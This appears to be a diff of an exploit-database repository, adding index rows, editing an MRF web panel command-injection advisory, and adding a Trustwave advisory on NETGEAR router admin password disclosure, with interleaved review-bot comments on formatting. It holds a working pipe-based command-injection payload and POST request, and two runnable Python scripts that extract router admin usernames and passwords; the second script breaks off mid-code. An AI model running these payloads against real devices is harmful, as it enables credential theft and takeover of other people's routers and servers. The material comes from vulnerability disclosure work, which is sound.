16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
@ -11002,7 +11003,7 @@ id,file,description,date,author,platform,type,port
16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
16880,platforms/linux/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
@ -12360,7 +12361,7 @@ id,file,description,date,author,platform,type,port
21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0
21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0
21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - RPC Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0
21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0
21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0
@ -13433,7 +13434,7 @@ id,file,description,date,author,platform,type,port
26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0
26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161
26737,platforms/linux/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0
26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0
26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0
@ -13850,7 +13851,7 @@ id,file,description,date,author,platform,type,port
32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443
32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0
32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0
32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0
30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0
30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0
@ -20650,7 +20651,7 @@ id,file,description,date,author,platform,type,port
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Parameter Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
7965,platforms/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
@ -26907,9 +26908,9 @@ id,file,description,date,author,platform,type,port
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0
24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0
24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
24256,platforms/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0
24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0
24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection",2013-01-21,haidao,php,webapps,0
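Review bot: the renamed 24255 and 24257 rows drop the 'index.php' file name that the old descriptions carried ("'index.php' gadget Parameter" becomes "'gadget' Parameter"), while the 24334 row in the following Jaws hunk keeps "ControlPanel.php" in its description; pick one convention for whether the affected script is named alongside the parameter, since a search on the file name will no longer find 24255 or 24257.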
@ -26950,7 +26951,7 @@ id,file,description,date,author,platform,type,port
24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0
24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0
24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0
24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
24334,platforms/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0
24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0
24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps,0
@ -27757,7 +27758,7 @@ id,file,description,date,author,platform,type,port
25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - suggest_review.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
25740,platforms/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0
25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
@ -27936,7 +27937,7 @@ id,file,description,date,author,platform,type,port
25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0
25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0
25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0
25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0
25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps,0
@ -33846,7 +33847,7 @@ id,file,description,date,author,platform,type,port
34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0
34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",multiple,webapps,0
34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
34933,platforms/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
34934,platforms/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0
34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
@ -37133,6 +37134,9 @@ id,file,description,date,author,platform,type,port
41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
41205,platforms/hardware/webapps/41205.py,"Multiple Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0
41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41204,platforms/php/webapps/41204.txt,"Video Sharing Script 4.94 - 'uid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
41208,platforms/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps,0
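Review bot: the 41205 row ("Multiple Netgear Routers - Password Disclosure") is inserted between 41200 and 41201, breaking the ascending-ID order the rest of this hunk keeps; move it below the 41204 row so it sits just before 41208. Its author field, "Trustwave's SpiderLabs", also differs from the per-person credit used by the neighbouring rows and from the advisory's own Credit line ("Simon Kenin of Trustwave SpiderLabs"); decide which form the CSV should use.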

@ -12,48 +12,43 @@ Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
Affected parameter: MSM_MACRO_NAME (POST parameter)
Affected file: ms.cgi (/swms/ms.cgi)
Verified Affected Operation: Show Fatal Error and Log Package Configuration
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses.
and retrieve the output in the application's responses:
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
Proof Of Concept:
The attacker can login to the web panel as a standard user (non-administrator account)
and inject the POST parameter: MSM_MACRO_NAME with the following
payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
As a result the attacker receives the result of the command in the application response
In order to reproduce the vulnerability:
1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
https://vulnsite.com/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
and send the following POST request in order to retrieve the output of the 'pwd' command:
1. Login to the vulnerable MRF web panel (with a standard user account):
https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
POST /swms/ms.cgi HTTP/1.1
Host: vulnhost
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
3. You can see the output of the command 'pwd' in the server response:
4. Check the output of the injected command 'pwd' in the response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
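Review bot: the rewritten step 2 drops the old wording "set your session id", so the MSM_SID=<session_id> placeholder in the step 3 request body and Referer is no longer explained anywhere in the new text; keep a short clause in step 2 or 3 stating that the placeholder is the session id obtained by the login in step 1. The host placeholders (Host: <vulnerable>, https://<vulnerable>/swms) are now consistent across all three occurrences, which is an improvement over the mixed vulnsite.com / vulnhost / vulnsite forms in the old text.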
@ -75,4 +70,4 @@ as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followed
The responsible disclosure policy has been followed
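Review bot: the old and new "The responsible disclosure policy has been followed" lines are textually identical, so this hunk changes only trailing whitespace or line endings; confirm that is intentional, since a whitespace-only hunk in an advisory is usually an editor artifact rather than a content change.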

@ -0,0 +1,358 @@
Trustwave SpiderLabs Security Advisory TWSL2017-003:
Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017
Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/)
Product: Multiple products
Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Product description:
Multiple Netgear Routers
Many Netgear routers are prone to password disclosure via simple crafted
requests to the web management server. The bug is exploitable remotely if the
remote management option is set and can also be exploited given access to the
router over LAN or WLAN.
When trying to access the web panel a user is asked to authenticate, if the
authentication is cancelled and password recovery is not enabled, the user is
redirected to a page which exposes a password recovery token. If a user
supplies the correct token to the page
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
enabled), they will receive the admin password for the router.
If password recovery is set the exploit will fail, as it will ask the user for the recovery
questions which were previously set when enabling the feature, this is
persistent, even after disabling the recovery option the exploit will fail,
because the router will ask for the security questions.
This can easily be reproduced using the attached poc, or by sending these two
simple requests via the browser:
1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token
2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
## netgore.py
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage - get token
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
token = scrape(r.text, 'unauth.cgi?id=', '\"')
if token == 'i_dont_speak_english':
print "not vulnerable"
sys.exit(0)
print "token found: " + token
#2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token
r = requests.post(url, verify=False)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable becuse password recovery IS set"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.
Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Many Netgear routers are prone to password disclosure via simple crafted
request to the web management server. The bug is exploitable remotely if the
remote management option is set and can also be exploited given access to the
router over LAN or WLAN.
Netgear routers have an option to restore forgotten password via 2 security
questions. If the recovery option is disabled (which is the default), it is
still possible to recover the password by sending a correct token to the
recovery page.
If a user supplies the correct token to the page
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
enabled), they will receive the admin password for the router. If password
recovery is set the exploit will fail, as it will ask the user for the recovery
questions which were previously set when enabling the feature, this is
persistent, even after disabling the recovery option, the exploit will fail,
because the router will ask for the security questions.
This mechanism does not work correctly on the very first request to
"passwordrecovered.cgi" and the token is not properly checked, this means that
any TOKEN value will result in disclosure of the password.
The issue occurs after every reboot of the router.
This can easily be reproduced using the attached poc, or by sending a simple
request via the browser:
1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
## netgore2.py
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
#2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt'
try:
r = requests.post(url, verify=False)
except:
print "not vulnerable router"
